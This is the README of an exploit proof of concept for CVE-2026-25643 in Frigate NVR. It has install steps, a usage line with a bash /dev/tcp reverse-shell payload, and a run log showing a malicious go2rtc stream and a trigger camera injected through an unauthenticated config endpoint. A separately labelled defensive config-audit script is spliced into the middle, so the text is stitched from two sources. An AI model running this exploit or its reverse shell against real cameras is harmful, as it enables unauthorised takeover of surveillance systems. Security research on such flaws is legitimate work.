joshuavanderpoll/CVE-2026-25643

Frigate NVR ≤ 0.16.3 Blind RCE Exploit (CVE-2026-25643) PoC

📜 Description

This Python exploit targets a critical configuration manipulation vulnerability in Frigate NVR versions up to 0.16.3 (both authenticated and unauthenticated paths). By injecting a malicious go2rtc stream and a fake camera entry, it triggers arbitrary command execution as the Frigate process during service restart — no reverse shell or output capture required.

🛠️ Installation

Note

To ensure a clean and isolated environment for the project dependencies, it's recommended to use Python's venv module.

OSX/Linux

git clone https://github.com/joshuavanderpoll/CVE-2026-25643.git
cd CVE-2026-25643
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt

Windows

git clone https://github.com/joshuavanderpoll/CVE-2026-25643.git
cd CVE-2026-25643
python -m venv .venv 
.venv\Scripts\activate
pip3 install -r requirements.txt

⚙️ Usage

python3 CVE-2026-25643.py -c "bash -i >& /dev/tcp/host.docker.internal/1111 0>&1" --url http://localhost:5001/

 Target : http://localhost:5001
 Command: bash -i >& /dev/tcp/host.docker.internal/1111 0>&1

[!] No credentials provided → attempting unauthenticated access
[*] Fetching current configuration (/api/config/raw) ...
[*] Config fetch → HTTP 200
[*] Received 914 bytes
[*] Config was JSON-wrapped → unwrapped
[+] Config parsed successfully (7 top-level keys)
[*] Preparing payload → executing: bash -i >& /dev/tcp/host.docker.internal/1111 0>&1
[*] Using payload: bash -c 'bash -i >& /dev/tcp/host.docker.internal/1111 0>&1'
[+] Injected malicious stream → debug_cmd
[+] Injected trigger camera → trigger_exec
[*] Sending modified config (861 bytes) with option: restart
[*] Config save → HTTP 200
[+] Configuration accepted (server should restart)

============================================================
 Payload sent! Command should execute during go2rtc init / camera probe.
 Keep in mind:
 • Output is NOT captured (blind execution)
 • Command runs as the user/frigate process
 • Multiple executions may occur during restart
============================================================
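
A defender-side check for the change this PoC makes, as an added example that is not part of this repository: it audits an already-parsed Frigate config for go2rtc streams with command-running sources and for cameras that read from them. Assumptions: the execution path is go2rtc's `exec:`/`echo:` source schemes (this page does not name it), the function names and sample config are constructed, and `debug_cmd`/`trigger_exec` are the entry names printed in the output above.

```python
# Added example (not the repository's code): audit a parsed Frigate config.
# Assumption: command execution goes through go2rtc's "exec:"/"echo:" sources.
CMD_SCHEMES = ("exec:", "echo:")
POC_NAMES = {"debug_cmd", "trigger_exec"}  # entry names from the PoC output

SAMPLE = {  # constructed config, parsed from YAML into a dict
    "go2rtc": {"streams": {
        "front_door": ["rtsp://192.0.2.10:554/stream1"],
        "debug_cmd": "exec:PLACEHOLDER_COMMAND",
    }},
    "cameras": {
        "front_door": {"ffmpeg": {"inputs": [
            {"path": "rtsp://127.0.0.1:8554/front_door"}]}},
        "trigger_exec": {"ffmpeg": {"inputs": [
            {"path": "rtsp://127.0.0.1:8554/debug_cmd"}]}},
    },
}


def _as_list(value):
    """A go2rtc stream may be one source string or a list of them."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def audit_config(cfg):
    """Return sorted (kind, name, reason) findings for a parsed config."""
    findings, risky = set(), set()
    streams = (cfg.get("go2rtc") or {}).get("streams") or {}
    for name, sources in streams.items():
        if name in POC_NAMES:
            findings.add(("stream", name, "PoC name"))
        for src in _as_list(sources):
            if str(src).strip().lower().startswith(CMD_SCHEMES):
                risky.add(name)
                findings.add(("stream", name, "command source"))
    for cam, body in (cfg.get("cameras") or {}).items():
        if cam in POC_NAMES:
            findings.add(("camera", cam, "PoC name"))
        inputs = ((body or {}).get("ffmpeg") or {}).get("inputs") or []
        for inp in inputs:
            # Frigate inputs usually point at the local restream by stream name.
            path = str((inp or {}).get("path", "")).split("?")[0]
            stream = path.rstrip("/").rsplit("/", 1)[-1]
            if stream in risky:
                findings.add(("camera", cam, "reads stream " + stream))
    return sorted(findings)
```

`exec:` sources also have legitimate uses, so treat each finding as an entry to review against a known-good copy of the config.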

🐋 Docker PoC

cd docker/
docker compose down
docker compose up -d
# You can test at --url http://127.0.0.1:5001

💻 Example

[Screenshots: "Execute PoC" and "Receive connection"]

🕵🏼 References

📢 Disclaimer

This tool is provided for educational and research purposes only. The creator assumes no responsibility for any misuse or damage caused by the tool.